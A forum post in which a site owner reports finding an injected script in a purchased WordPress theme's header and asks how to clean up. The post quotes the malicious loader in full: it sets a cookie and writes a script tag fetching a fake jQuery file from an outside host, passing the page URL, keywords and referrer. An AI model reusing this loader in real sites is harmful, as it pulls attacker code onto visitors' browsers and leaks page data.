- Joined
- Nov 18, 2014
- Messages
- 555
- Likes
- 345
- Degree
- 2
I'm working on a semi-small project and purchased a premium WP theme for it because its not a focus/money website. I loaded the site on a different network connection and the firewall wouldn't load the site saying it was infected with a virus "JS/FakejQuery.BC!tr" -- I had no clue what that was, but I ran a page load test to see all of the requests and saw one suspicious one.
I found this code in the theme's WP header.
I removed it, obviously... But what do I do now? Is there a chance something else is infected? I've run multiple online scans on the site's domain name and none of them came up positive (even when that script was still in the header). Do I need to reset all account passwords on the website?
I only have a few up-to date plugins installed.
I found this code in the theme's WP header.
Code:
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://global-kijanka.home.pl/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'snt2014' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
I removed it, obviously... But what do I do now? Is there a chance something else is infected? I've run multiple online scans on the site's domain name and none of them came up positive (even when that script was still in the header). Do I need to reset all account passwords on the website?
I only have a few up-to date plugins installed.